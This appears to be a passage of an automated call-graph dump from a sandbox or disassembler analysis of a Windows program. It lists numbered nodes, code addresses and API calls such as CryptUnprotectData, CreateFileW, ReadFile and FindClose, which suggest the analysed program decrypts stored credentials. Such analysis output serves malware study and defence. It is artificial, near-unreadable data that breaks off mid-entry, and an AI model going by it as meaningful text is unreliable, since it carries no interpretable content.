38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 38988->38977 38990 404413 FreeLibrary 38989->38990 38991 40441e 38989->38991 38990->38991 38991->38429 38992->38426 38994 40447e 38993->38994 38995 40442e 38993->38995 38996 404485 CryptUnprotectData 38994->38996 38997 40449c 38994->38997 38998 40b2cc 27 API calls 38995->38998 38996->38997 38997->38426 38999 404438 38998->38999 39000 40a804 8 API calls 38999->39000 39001 40443e 39000->39001 39002 40444f 39001->39002 39003 40b273 27 API calls 39001->39003 39002->38994 39004 404475 FreeLibrary 39002->39004 39003->39002 39004->38994 39006 4135f6 39005->39006 39007 4135eb FreeLibrary 39005->39007 39006->38432 39007->39006 39009 4449c4 39008->39009 39027 444a48 39008->39027 39010 40b2cc 27 API calls 39009->39010 39011 4449cb 39010->39011 39012 40a804 8 API calls 39011->39012 39013 4449d1 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4449dc 39014->39015 39016 40b273 27 API calls 39015->39016 39017 4449f3 39016->39017 39018 40b273 27 API calls 39017->39018 39019 444a04 39018->39019 39020 40b273 27 API calls 39019->39020 39021 444a15 39020->39021 39022 40b273 27 API calls 39021->39022 39023 444a26 39022->39023 39024 40b273 27 API calls 39023->39024 39025 444a37 39024->39025 39026 40b273 27 API calls 39025->39026 39026->39027 39027->38452 39027->38453 39028->38462 39029->38462 39030->38462 39031->38462 39032->38454 39034 403a29 39033->39034 39048 403bed memset memset 39034->39048 39036 403ae7 39061 40b1ab ??3@YAXPAX ??3@YAXPAX 39036->39061 39037 403a3f memset 39041 403a2f 39037->39041 39039 403aef 39039->38471 39040 409d1f 6 API calls 39040->39041 39041->39036 39041->39037 39041->39040 39042 409b98 GetFileAttributesW 39041->39042 39043 40a8d0 7 API calls 39041->39043 39042->39041 39043->39041 39045 40a051 GetFileTime CloseHandle 39044->39045 39046 4039ca CompareFileTime 39044->39046 39045->39046 39046->38471 39047->38470 39049 414c2e 16 API calls 39048->39049 39050 403c38 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c3f wcscat 39051->39052 39053 414c2e 16 API calls 39052->39053 39054 403c61 39053->39054 39055 409719 2 API calls 39054->39055 39056 403c68 wcscat 39055->39056 39062 403af5 39056->39062 39059 403af5 20 API calls 39060 403c95 39059->39060 39060->39041 39061->39039 39063 403b02 39062->39063 39064 40ae18 9 API calls 39063->39064 39073 403b37 39064->39073 39065 403bdb 39067 40aebe FindClose 39065->39067 39066 40add4 wcscmp wcscmp 39066->39073 39068 403be6 39067->39068 39068->39059 39069 40a8d0 7 API calls 39069->39073 39070 40ae18 9 API calls 39070->39073 39071 40ae51 9 API calls 39071->39073 39072 40aebe FindClose 39072->39073 39073->39065 39073->39066 39073->39069 39073->39070 39073->39071 39073->39072 39075 409d1f 6 API calls 39074->39075 39076 404190 39075->39076 39089 409b98 GetFileAttributesW 39076->39089 39078 40419c 39079 4041a7 6 API calls 39078->39079 39080 40435c 39078->39080 39081 40424f 39079->39081 39080->38492 39081->39080 39083 40425e memset 39081->39083 39085 409d1f 6 API calls 39081->39085 39086 40a8ab 9 API calls 39081->39086 39090 414842 39081->39090 39083->39081 39084 404296 wcscpy 39083->39084 39084->39081 39085->39081 39087 4042b6 memset memset _snwprintf wcscpy 39086->39087 39087->39081 39088->38496 39089->39078 39093 41443e 39090->39093 39092 414866 39092->39081 39094 41444b 39093->39094 39095 414451 39094->39095 39096 4144a3 GetPrivateProfileStringW 39094->39096 39097 414491 39095->39097 39098 414455 wcschr 39095->39098 39096->39092 39100 414495 WritePrivateProfileStringW 39097->39100 39098->39097 39099 414463 _snwprintf 39098->39099 39099->39100 39100->39092 39101->38501 39103 40b2cc 27 API calls 39102->39103 39104 409615 39103->39104 39105 409d1f 6 API calls 39104->39105 39106 409625 39105->39106 39129 409b98 GetFileAttributesW 39106->39129 39108 409634 39109 409648 39108->39109 39146 4091b8 238 API calls 39108->39146 39111 40b2cc 27 API calls 39109->39111 39113 408801 39109->39113 39112 40965d 39111->39112 39114 409d1f 6 API calls 39112->39114 39113->38504 39113->38536 39115 40966d 39114->39115 39130 409b98 GetFileAttributesW 39115->39130 39117 40967c 39117->39113 39131 409529 39117->39131 39119->38526 39120->38536 39121->38531 39122->38536 39123->38537 39124->38538 39125->38542 39126->38544 39127->38547 39128->38536 39129->39108 39130->39117 39147 4096c3 CreateFileW 39131->39147 39133 409543 39134 4095cd 39133->39134 39135 409550 GetFileSize 39133->39135 39134->39113 39136 409577 CloseHandle 39135->39136 39137 40955f 39135->39137 39136->39134 39142 409585 39136->39142 39138 40afcf 2 API calls 39137->39138 39139 409569 39138->39139 39148 40a2ef ReadFile 39139->39148 39141 409574 39141->39136 39142->39134 39143 4095c3 39142->39143 39149 408b8d 38 API calls 39142->39149 39150 40908b 55 API calls 39143->39150 39146->39109 39147->39133 39148->39141 39149->39142 39150->39134 39178 413f4f 39151->39178 39154 413f37 K32GetModuleFileNameExW 39155 413f4a 39154->39155 39155->38565 39157 413969 wcscpy 39156->39157 39158 41396c wcschr 39156->39158 39170 413a3a 39157->39170 39158->39157 39160 41398e 39158->39160 39182 4097f7 wcslen wcslen _memicmp 39160->39182 39162 41399a 39163 4139a4 memset 39162->39163 39164 4139e6 39162->39164 39183 409dd5 GetWindowsDirectoryW wcscpy 39163->39183 39166 413a31 wcscpy 39164->39166 39167 4139ec memset 39164->39167 39166->39170 39184 409dd5 GetWindowsDirectoryW wcscpy 39167->39184 39168 4139c9 wcscpy wcscat 39168->39170 39170->38565 39171 413a11 memcpy wcscat 39171->39170 39173 413cb0 GetModuleHandleW 39172->39173 39174 413cda 39172->39174 39173->39174 39175 413cbf 39173->39175 39176 413ce3 GetProcessTimes 39174->39176 39177 413cf6 39174->39177 39175->39174 39176->38567 39177->38567 39179 413f54 39178->39179 39181 413f2f 39178->39181 39180 40a804 8 API calls 39179->39180 39180->39181 39181->39154 39181->39155 39182->39162 39183->39168 39184->39171 39185->38587 39186->38610 39188 409cf9 GetVersionExW 39187->39188 39189 409d0a 39187->39189 39188->39189 39189->38617 39189->38621 39190->38624 39191->38627 39192->38629 39193->38674 39195 40bba5 39194->39195 39310 40cc26 39195->39310 39198 40bd4b 39331 40cc0c 39198->39331 39203 40b2cc 27 API calls 39204 40bbef 39203->39204 39338 40ccf0 _wcsicmp 39204->39338 39206 40bbf5 39206->39198 39339 40ccb4 6 API calls 39206->39339 39208 40bc26 39209 40cf04 17 API calls 39208->39209 39210 40bc2e 39209->39210 39211 40bd43 39210->39211 39212 40b2cc 27 API calls 39210->39212 39213 40cc0c 4 API calls 39211->39213 39214 40bc40 39212->39214 39213->39198 39340 40ccf0 _wcsicmp 39214->39340 39216 40bc46 39216->39211 39217 40bc61 memset memset WideCharToMultiByte 39216->39217 39341 40103c strlen 39217->39341 39219 40bcc0 39220 40b273 27 API calls 39219->39220 39221 40bcd0 memcmp 39220->39221 39221->39211 39222 40bce2 39221->39222 39223 404423 37 API calls 39222->39223 39224 40bd10 39223->39224 39224->39211 39225 40bd3a LocalFree 39224->39225 39226 40bd1f memcpy 39224->39226 39225->39211 39226->39225 39227->38689 39401 4438b5 39228->39401 39230 44444c 39231 40b879 39230->39231 39415 415a6d 39230->39415 39231->38692 39231->38693 39234 444486 39236 4444b9 memcpy 39234->39236 39273 4444a4 39234->39273 39235 44469e 39235->39231 39466 443d90 110 API calls 39235->39466 39419 415258 39236->39419 39239 444524 39240 444541 39239->39240 39241 44452a 39239->39241 39422 444316 39240->39422 39456 416935 16 API calls 39241->39456 39245 444316 18 API calls 39246 444563 39245->39246 39247 444316 18 API calls 39246->39247 39248 44456f 39247->39248 39249 444316 18 API calls 39248->39249 39250 44457f 39249->39250 39250->39273 39436 432d4e 39250->39436 39253 444316 18 API calls 39254 4445b0 39253->39254 39440 41eed2 39254->39440 39256 4445cf 39257 4445d6 39256->39257 39258 4445ee 39256->39258 39457 416935 16 API calls 39257->39457 39458 43302c memset 39258->39458 39260 4445fa 39459 43302c memset 39260->39459 39263 444609 39263->39273 39460 416935 16 API calls 39263->39460 39265 444646 39461 434d4b 17 API calls 39265->39461 39267 44464d 39462 437655 16 API calls 39267->39462 39269 444653 39463 4442e6 11 API calls 39269->39463 39271 44465d 39271->39273 39464 416935 16 API calls 39271->39464 39465 4442e6 11 API calls 39273->39465 39504 438460 39274->39504 39276 40b8a4 39276->38699 39280 4251c4 39276->39280 39278 409a74 GetTempFileNameW 39277->39278 39279 409a66 GetWindowsDirectoryW 39277->39279 39278->38686 39279->39278 39601 424f07 11 API calls 39280->39601 39282 4251e4 39283 4251f7 39282->39283 39284 4251e8 39282->39284 39603 4250f8 39283->39603 39602 4446ea 11 API calls 39284->39602 39286 4251f2 39286->38724 39288 425209 39291 425249 39288->39291 39294 4250f8 126 API calls 39288->39294 39295 425287 39288->39295 39611 4384e9 134 API calls 39288->39611 39612 424f74 123 API calls 39288->39612 39291->39295 39613 424ff0 13 API calls 39291->39613 39294->39288 39615 415c7d 16 API calls 39295->39615 39296 425266 39296->39295 39614 415be9 memcpy 39296->39614 39298->38724 39299->38724 39300->38724 39301->38724 39302->38724 39303->38724 39304->38724 39305->38724 39306->38724 39307->38699 39308->38692 39309->38721 39342 4096c3 CreateFileW 39310->39342 39312 40cc34 39313 40cc3d GetFileSize 39312->39313 39314 40bbca 39312->39314 39315 40afcf 2 API calls 39313->39315 39314->39198 39322 40cf04 39314->39322 39316 40cc64 39315->39316 39343 40a2ef ReadFile 39316->39343 39318 40cc71 39344 40ab4a MultiByteToWideChar 39318->39344 39320 40cc95 CloseHandle 39321 40b04b ??3@YAXPAX 39320->39321 39321->39314 39323 40b633 ??3@YAXPAX 39322->39323 39324 40cf14 39323->39324 39350 40b1ab ??3@YAXPAX ??3@YAXPAX 39324->39350 39326 40bbdd 39326->39198 39326->39203 39327 40cf1b 39327->39326 39329 40cfef 39327->39329 39351 40cd4b 39327->39351 39330 40cd4b 14 API calls 39329->39330 39330->39326 39332 40b633 ??3@YAXPAX 39331->39332 39333 40cc15 39332->39333 39334 40aa04 ??3@YAXPAX 39333->39334 39335 40cc1d 39334->39335 39400 40b1ab ??3@YAXPAX ??3@YAXPAX 39335->39400 39337 40b7d4 memset CreateFileW 39337->38679 39337->38680 39338->39206 39339->39208 39340->39216 39341->39219 39342->39312 39343->39318 39345 40ab6b 39344->39345 39349 40ab93 39344->39349 39346 40a9ce 4 API calls 39345->39346 39347 40ab74 39346->39347 39348 40ab7c MultiByteToWideChar 39347->39348 39348->39349 39349->39320 39350->39327 39352 40cd7b 39351->39352 39385 40aa29 39352->39385 39354 40cef5 39355 40aa04 ??3@YAXPAX 39354->39355 39356 40cefd 39355->39356 39356->39327 39358 40aa29 6 API calls 39359 40ce1d 39358->39359 39360 40aa29 6 API calls 39359->39360 39361 40ce3e 39360->39361 39362 40ce6a 39361->39362 39393 40abb7 wcslen memmove 39361->39393 39363 40ce9f 39362->39363 39396 40abb7 wcslen memmove 39362->39396 39366 40a8d0 7 API calls 39363->39366 39369 40ceb5 39366->39369 39367 40ce56 39394 40aa71 wcslen 39367->39394 39368 40ce8b 39397 40aa71 wcslen 39368->39397 39375 40a8d0 7 API calls 39369->39375 39372 40ce5e 39395 40abb7 wcslen memmove 39372->39395 39373 40ce93 39398 40abb7 wcslen memmove 39373->39398 39377 40cecb 39375->39377 39399 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39377->39399 39379 40cedd 39380 40aa04 ??3@YAXPAX 39379->39380 39381 40cee5 39380->39381 39382 40aa04 ??3@YAXPAX 39381->39382 39383 40ceed 39382->39383 39384 40aa04 ??3@YAXPAX 39383->39384 39384->39354 39386 40aa33 39385->39386 39392 40aa63 39385->39392 39387 40aa44 39386->39387 39388 40aa38 wcslen 39386->39388 39389 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39387->39389 39388->39387 39390 40aa4d 39389->39390 39391 40aa51 memcpy 39390->39391 39390->39392 39391->39392 39392->39354 39392->39358 39393->39367 39394->39372 39395->39362 39396->39368 39397->39373 39398->39363 39399->39379 39400->39337 39402 4438d0 39401->39402 39412 4438c9 39401->39412 39467 415378 memcpy memcpy 39402->39467 39412->39230 39416 415a77 39415->39416 39417 415a8d 39416->39417 39418 415a7e memset 39416->39418 39417->39234 39418->39417 39420 4438b5 11 API calls 39419->39420 39421 41525d 39420->39421 39421->39239 39423 444328 39422->39423 39424 444423 39423->39424 39425 44434e 39423->39425 39470 4446ea 11 API calls 39424->39470 39426 432d4e 3 API calls 39425->39426 39428 44435a 39426->39428 39430 444375 39428->39430 39435 44438b 39428->39435 39429 432d4e 3 API calls 39431 4443ec 39429->39431 39468 416935 16 API calls 39430->39468 39433 444381 39431->39433 39469 416935 16 API calls 39431->39469 39433->39245 39435->39429 39437 432d58 39436->39437 39439 432d65 39436->39439 39471 432cc4 memset memset memcpy 39437->39471 39439->39253 39441 41eee2 39440->39441 39442 415a6d memset 39441->39442 39443 41ef23 39442->39443 39444 415a6d memset 39443->39444 39455 41ef2d 39443->39455 39445 41ef42 39444->39445 39449 41ef49 39445->39449 39472 41b7d9 39445->39472 39447 41ef66 39448 41ef74 memset 39447->39448 39447->39449 39450 41ef91 39448->39450 39453 41ef9e 39448->39453 39449->39455 39490 41b321 100 API calls 39449->39490 39486 41519d 39450->39486 39453->39449 39489 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39453->39489 39455->39256 39456->39273 39457->39273 39458->39260 39459->39263 39460->39265 39461->39267 39462->39269 39463->39271 39464->39273 39465->39235 39466->39231 39468->39433 39469->39433 39470->39433 39471->39439 39478 41b812 39472->39478 39473 415a6d memset 39474 41b8c2 39473->39474 39475 41b980 39474->39475 39476 41b902 memcpy memcpy memcpy memcpy memcpy 39474->39476 39481 41b849 39474->39481 39483 41b9ad 39475->39483 39492 4151e3 39475->39492 39476->39475 39478->39481 39485 41b884 39478->39485 39491 444706 11 API calls 39478->39491 39480 41ba12 39480->39481 39482 41ba32 memset 39480->39482 39481->39447 39482->39481 39483->39481 39495 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39483->39495 39485->39473 39485->39481 39496 4175ed 39486->39496 39489->39449 39490->39455 39491->39485 39494 41837f 54 API calls 39492->39494 39493 4151f9 39493->39483 39494->39493 39495->39480 39497 417570 SetFilePointer GetLastError GetLastError 39496->39497 39498 4175ff 39497->39498 39499 41760a ReadFile 39498->39499 39500 4151b3 39498->39500 39501 417637 39499->39501 39502 417627 GetLastError 39499->39502 39500->39453 39501->39500 39503 41763e memset 39501->39503 39502->39500 39503->39500 39516 41703f 39504->39516 39506 43847a 39507 43848a 39506->39507 39508 43847e 39506->39508 39523 438270 39507->39523 39553 4446ea 11 API calls 39508->39553 39513 4384bb 39514 438270 133 API calls 39513->39514 39515 438488 39514->39515 39515->39276 39517 417044 39516->39517 39518 41705c 39516->39518 39522 417055 39517->39522 39555 416760 11 API calls 39517->39555 39519 417075 39518->39519 39556 41707a 11 API calls 39518->39556 39519->39506 39522->39506 39557 415a91 39523->39557 39525 43828d 39526 438297 39525->39526 39527 438341 39525->39527 39529 4382d6 39525->39529 39600 415c7d 16 API calls 39526->39600 39561 44358f 39527->39561 39532 4382fb 39529->39532 39533 4382db 39529->39533 39531 438458 39531->39515 39554 424f26 122 API calls 39531->39554 39594 415c23 memcpy 39532->39594 39592 416935 16 API calls 39533->39592 39536 4382e9 39593 415c7d 16 API calls 39536->39593 39537 438305 39540 44358f 19 API calls 39537->39540 39542 438318 39537->39542 39539 438373 39546 438383 39539->39546 39595 4300e8 memset memset memcpy 39539->39595 39540->39542 39542->39539 39587 43819e 39542->39587 39544 4383f5 39549 438404 39544->39549 39550 43841c 39544->39550 39545 4383cd 39545->39544 39597 42453e 122 API calls 39545->39597 39546->39545 39596 415c23 memcpy 39546->39596 39598 416935 16 API calls 39549->39598 39599 416935 16 API calls 39550->39599 39553->39515 39554->39513 39555->39522 39556->39517 39558 415a9d 39557->39558 39559 415ab3 39558->39559 39560 415aa4 memset 39558->39560 39559->39525 39560->39559 39562 4435be 39561->39562 39563 443676 39562->39563 39566 4436ce 39562->39566 39569 442ff8 19 API calls 39562->39569 39571 44366c 39562->39571 39585 44360c 39562->39585 39564 443737 39563->39564 39567 442ff8 19 API calls 39563->39567 39570 443758 39563->39570 39568 442ff8 19 API calls 39564->39568 39565 441409 memset 39565->39570 39573 4165ff 11 API calls 39566->39573 39567->39564 39568->39570 39569->39562 39570->39565 39575 443775 39570->39575 39574 4169a7 11 API calls 39571->39574 39572 4437be 39576 416760 11 API calls 39572->39576 39577 4437de 39572->39577 39573->39563 39574->39563 39575->39572 39581 415c56 11 API calls 39575->39581 39576->39577 39578 42463b memset memcpy 39577->39578 39580 443801 39577->39580 39578->39580 39579 443826 39583 43bd08 memset 39579->39583 39580->39579 39582 43024d memset 39580->39582 39581->39572 39582->39579 39584 443837 39583->39584 39584->39585 39586 43024d memset 39584->39586 39585->39542 39586->39584 39588 438246 39587->39588 39590 4381ba 39587->39590 39588->39539 39589 41f432 109 API calls 39589->39590 39590->39588 39590->39589 39591 41f638 103 API calls 39590->39591 39591->39590 39592->39536 39593->39526 39594->39537 39595->39546 39596->39545 39597->39544 39598->39526 39599->39526 39600->39531 39601->39282 39602->39286 39604 425108 39603->39604 39610 42510d 39603->39610 39648 424f74 123 API calls 39604->39648 39607 42516e 39649 415c7d 16 API calls 39607->39649 39608 425115 39608->39288 39610->39608 39616 42569b 39610->39616 39611->39288 39612->39288 39613->39296 39614->39295 39615->39286 39627 4256f1 39616->39627 39644 4259c2 39616->39644 39621 4260dd 39661 424251 119 API calls 39621->39661 39622 429a4d 39629 429a66 39622->39629 39630 429a9b 39622->39630 39626 422aeb memset memcpy memcpy 39626->39627 39627->39622 39627->39626 39632 4260a1 39627->39632 39641 4259da 39627->39641 39642 429ac1 39627->39642 39627->39644 39647 425a38 39627->39647 39650 4227f0 memset memcpy 39627->39650 39651 422b84 15 API calls 39627->39651 39652 422b5d memset memcpy memcpy 39627->39652 39653 422640 13 API calls 39627->39653 39655 4241fc 11 API calls 39627->39655 39656 42413a 89 API calls 39627->39656 39662 415c56 11 API calls 39629->39662 39631 429a96 39630->39631 39664 416760 11 API calls 39630->39664 39665 424251 119 API calls 39631->39665 39659 415c56 11 API calls 39632->39659 39634 429a7a 39663 416760 11 API calls 39634->39663 39660 416760 11 API calls 39641->39660 39643 425ad6 39642->39643 39666 415c56 11 API calls 39642->39666 39643->39607 39644->39643 39654 415c56 11 API calls 39644->39654 39647->39644 39657 422640 13 API calls 39647->39657 39658 4226e0 12 API calls 39647->39658 39648->39610 39649->39608 39650->39627 39651->39627 39652->39627 39653->39627 39654->39641 39655->39627 39656->39627 39657->39647 39658->39647 39659->39641 39660->39621 39661->39643 39662->39634 39663->39631 39664->39631 39665->39642 39666->39641 39667->38759 39668->38767 39669 44dea5 39670 44deb5 FreeLibrary 39669->39670 39671 44dec3 39669->39671 39670->39671 39672 4147f3 39675 414561 39672->39675 39674 414813 39676 41456d 39675->39676 39677 41457f GetPrivateProfileIntW 39675->39677 39680 4143f1 memset _itow WritePrivateProfileStringW 39676->39680 39677->39674 39679 41457a 39679->39674 39680->39679 39681 44def7 39682 44df07 39681->39682 39683 44df00 ??3@YAXPAX 39681->39683 39684 44df17 39682->39684 39685 44df10 ??3@YAXPAX 39682->39685 39683->39682 39686 44df27 39684->39686 39687 44df20 ??3@YAXPAX 39684->39687 39685->39684 39688 44df37 39686->39688 39689 44df30 ??3@YAXPAX 39686->39689 39687->39686 39689->39688 39690 4287c1 39691 4287d2 39690->39691 39692 429ac1 39690->39692 39693 428818 39691->39693 39694 42881f 39691->39694 39709 425711 39691->39709 39704 425ad6 39692->39704 39760 415c56 11 API calls 39692->39760 39727 42013a 39693->39727 39755 420244 96 API calls 39694->39755 39698 4260dd 39754 424251 119 API calls 39698->39754 39702 4259da 39753 416760 11 API calls 39702->39753 39705 429a4d 39711 429a66 39705->39711 39712 429a9b 39705->39712 39708 422aeb memset memcpy memcpy 39708->39709 39709->39692 39709->39702 39709->39705 39709->39708 39714 4260a1 39709->39714 39723 4259c2 39709->39723 39726 425a38 39709->39726 39743 4227f0 memset memcpy 39709->39743 39744 422b84 15 API calls 39709->39744 39745 422b5d memset memcpy memcpy 39709->39745 39746 422640 13 API calls 39709->39746 39748 4241fc 11 API calls 39709->39748 39749 42413a 89 API calls 39709->39749 39756 415c56 11 API calls 39711->39756 39713 429a96 39712->39713 39758 416760 11 API calls 39712->39758 39759 424251 119 API calls 39713->39759 39752 415c56 11 API calls 39714->39752 39716 429a7a 39757 416760 11 API calls 39716->39757 39723->39704 39747 415c56 11 API calls 39723->39747 39726->39723 39750 422640 13 API calls 39726->39750 39751 4226e0 12 API calls 39726->39751 39728 42014c 39727->39728 39731 420151 39727->39731 39770 41e466 96 API calls 39728->39770 39730 420162 39730->39709 39731->39730 39732 4201b3 39731->39732 39733 420229 39731->39733 39734 4201b8 39732->39734 39735 4201dc 39732->39735 39733->39730 39736 41fd5e 85 API calls 39733->39736 39761 41fbdb 39734->39761 39735->39730 39740 4201ff 39735->39740 39767 41fc4c 39735->39767 39736->39730 39740->39730 39742 42013a 96 API calls 39740->39742 39742->39730 39743->39709 39744->39709 39745->39709 39746->39709 39747->39702 39748->39709 39749->39709 39750->39726 39751->39726 39752->39702 39753->39698 39754->39704 39755->39709 39756->39716 39757->39713 39758->39713 39759->39692 39760->39702 39762 41fbf8 39761->39762 39765 41fbf1 39761->39765 39775 41ee26 39762->39775 39766 41fc39 39765->39766 39785 4446ce 11 API calls 39765->39785 39766->39730 39771 41fd5e 39766->39771 39768 41ee6b 85 API calls 39767->39768 39769 41fc5d 39768->39769 39769->39735 39770->39731 39773 41fd65 39771->39773 39772 41fdab 39772->39730 39773->39772 39774 41fbdb 85 API calls 39773->39774 39774->39773 39776 41ee41 39775->39776 39777 41ee32 39775->39777 39786 41edad 39776->39786 39789 4446ce 11 API calls 39777->39789 39780 41ee3c 39780->39765 39783 41ee58 39783->39780 39791 41ee6b 39783->39791 39785->39766 39795 41be52 39786->39795 39789->39780 39790 41eb85 11 API calls 39790->39783 39792 41ee70 39791->39792 39793 41ee78 39791->39793 39833 41bf99 85 API calls 39792->39833 39793->39780 39796 41be6f 39795->39796 39797 41be5f 39795->39797 39802 41be8c 39796->39802 39827 418c63 memset memset 39796->39827 39826 4446ce 11 API calls 39797->39826 39799 41be69 39799->39780 39799->39790 39802->39799 39803 41bf3a 39802->39803 39804 41bed1 39802->39804 39807 41bee7 39802->39807 39830 4446ce 11 API calls 39803->39830 39806 41bef0 39804->39806 39809 41bee2 39804->39809 39806->39807 39808 41bf01 39806->39808 39807->39799 39831 41a453 85 API calls 39807->39831 39810 41bf24 memset 39808->39810 39812 41bf14 39808->39812 39828 418a6d memset memcpy memset 39808->39828 39816 41ac13 39809->39816 39810->39799 39829 41a223 memset memcpy memset 39812->39829 39815 41bf20 39815->39810 39817 41ac52 39816->39817 39818 41ac3f memset 39816->39818 39821 41ac6a 39817->39821 39832 41dc14 19 API calls 39817->39832 39819 41acd9 39818->39819 39819->39807 39822 41519d 6 API calls 39821->39822 39823 41aca1 39821->39823 39822->39823 39823->39819 39824 41acc0 memset 39823->39824 39825 41accd memcpy 39823->39825 39824->39819 39825->39819 39826->39799 39827->39802 39828->39812 39829->39815 39830->39807 39832->39821 39833->39793 39834 417bc5 39836 417c61 39834->39836 39839 417bda 39834->39839 39835 417bf6 UnmapViewOfFile CloseHandle 39835->39835 39835->39839 39838 417c2c 39838->39839 39846 41851e 18 API calls 39838->39846 39839->39835 39839->39836 39839->39838 39841 4175b7 39839->39841 39842 4175d6 CloseHandle 39841->39842 39843 4175c8 39842->39843 39844 4175df 39842->39844 39843->39844 39845 4175ce Sleep 39843->39845 39844->39839 39845->39842 39846->39838 39847 4148b6 FindResourceW 39848 4148cf SizeofResource 39847->39848 39851 4148f9 39847->39851 39849 4148e0 LoadResource 39848->39849 39848->39851 39850 4148ee LockResource 39849->39850 39849->39851 39850->39851 39852 441b3f 39862 43a9f6 39852->39862 39854 441b61 40035 4386af memset 39854->40035 39856 44189a 39857 4418e2 39856->39857 39859 442bd4 39856->39859 39858 4418ea 39857->39858 40036 4414a9 12 API calls 39857->40036 39859->39858 40037 441409 memset 39859->40037 39863 43aa20 39862->39863 39870 43aadf 39862->39870 39864 43aa34 memset 39863->39864 39863->39870 39865 43aa56 39864->39865 39866 43aa4d 39864->39866 40038 43a6e7 39865->40038 40046 42c02e memset 39866->40046 39870->39854 39872 43aad3 40048 4169a7 11 API calls 39872->40048 39873 43aaae 39873->39870 39873->39872 39888 43aae5 39873->39888 39874 43ac18 39877 43ac47 39874->39877 40050 42bbd5 memcpy memcpy memcpy memset memcpy 39874->40050 39878 43aca8 39877->39878 40051 438eed 16 API calls 39877->40051 39882 43acd5 39878->39882 40053 4233ae 11 API calls 39878->40053 39881 43ac87 40052 4233c5 16 API calls 39881->40052 40054 423426 11 API calls 39882->40054 39886 43ace1 40055 439811 162 API calls 39886->40055 39887 43a9f6 160 API calls 39887->39888 39888->39870 39888->39874 39888->39887 40049 439bbb 22 API calls 39888->40049 39890 43acfd 39895 43ad2c 39890->39895 40056 438eed 16 API calls 39890->40056 39892 43ad19 40057 4233c5 16 API calls 39892->40057 39894 43ad58 40058 44081d 162 API calls 39894->40058 39895->39894 39898 43add9 39895->39898 39898->39898 40062 423426 11 API calls 39898->40062 39899 43ae3a memset 39900 43ae73 39899->39900 40063 42e1c0 146 API calls 39900->40063 39901 43adab 40060 438c4e 162 API calls 39901->40060 39902 43ad6c 39902->39870 39902->39901 40059 42370b memset memcpy memset 39902->40059 39906 43adcc 40061 440f84 12 API calls 39906->40061 39907 43ae96 40064 42e1c0 146 API calls 39907->40064 39910 43aea8 39913 43aec1 39910->39913 40065 42e199 146 API calls 39910->40065 39912 43af00 39912->39870 39917 43af1a 39912->39917 39918 43b3d9 39912->39918 39913->39912 40066 42e1c0 146 API calls 39913->40066 39914 43add4 39919 43b60f 39914->39919 40125 438f86 16 API calls 39914->40125 40067 438eed 16 API calls 39917->40067 39923 43b3f6 39918->39923 39928 43b4c8 39918->39928 39919->39870 40126 4393a5 17 API calls 39919->40126 39922 43af2f 40068 4233c5 16 API calls 39922->40068 40108 432878 12 API calls 39923->40108 39925 43af51 40069 423426 11 API calls 39925->40069 39927 43b4f2 40115 43a76c 21 API calls 39927->40115 39928->39927 40114 42bbd5 memcpy memcpy memcpy memset memcpy 39928->40114 39930 43af7d 40070 423426 11 API calls 39930->40070 39934 43af94 40071 423330 11 API calls 39934->40071 39935 43b529 40116 44081d 162 API calls 39935->40116 39936 43b462 40110 423330 11 API calls 39936->40110 39940 43b544 39944 43b55c 39940->39944 40117 42c02e memset 39940->40117 39941 43b428 39941->39936 40109 432b60 16 API calls 39941->40109 39942 43afca 40072 423330 11 API calls 39942->40072 39943 43b47e 39946 43b497 39943->39946 40111 42374a memcpy memset memcpy memcpy memcpy 39943->40111 40118 43a87a 162 API calls 39944->40118 40112 4233ae 11 API calls 39946->40112 39949 43afdb 40073 4233ae 11 API calls 39949->40073 39952 43b4b1 40113 423399 11 API calls 39952->40113 39954 43b56c 39957 43b58a 39954->39957 40119 423330 11 API calls 39954->40119 39956 43afee 40074 44081d 162 API calls 39956->40074 40120 440f84 12 API calls 39957->40120 39958 43b4c1 40122 42db80 162 API calls 39958->40122 39963 43b592 40121 43a82f 16 API calls 39963->40121 39966 43b5b4 40123 438c4e 162 API calls 39966->40123 39968 43b5cf 40124 42c02e memset 39968->40124 39970 43b005 39970->39870 39975 43b01f 39970->39975 40075 42d836 162 API calls 39970->40075 39971 43b1ef 40085 4233c5 16 API calls 39971->40085 39973 43b212 40086 423330 11 API calls 39973->40086 39975->39971 40083 423330 11 API calls 39975->40083 40084 42d71d 162 API calls 39975->40084 39977 43b087 40076 4233ae 11 API calls 39977->40076 39980 43b22a 40087 42ccb5 11 API calls 39980->40087 39983 43b23f 40088 4233ae 11 API calls 39983->40088 39984 43b10f 40079 423330 11 API calls 39984->40079 39986 43b257 40089 4233ae 11 API calls 39986->40089 39990 43b129 40080 4233ae 11 API calls 39990->40080 39991 43b26e 40090 4233ae 11 API calls 39991->40090 39994 43b09a 39994->39984 40077 42cc15 19 API calls 39994->40077 40078 4233ae 11 API calls 39994->40078 39996 43b282 40091 43a87a 162 API calls 39996->40091 39997 43b13c 40081 440f84 12 API calls 39997->40081 39999 43b29d 40092 423330 11 API calls 39999->40092 40002 43b15f 40082 4233ae 11 API calls 40002->40082 40003 43b2af 40005 43b2b8 40003->40005 40006 43b2ce 40003->40006 40093 4233ae 11 API calls 40005->40093 40094 440f84 12 API calls 40006->40094 40009 43b2c9 40096 4233ae 11 API calls 40009->40096 40010 43b2da 40095 42370b memset memcpy memset 40010->40095 40013 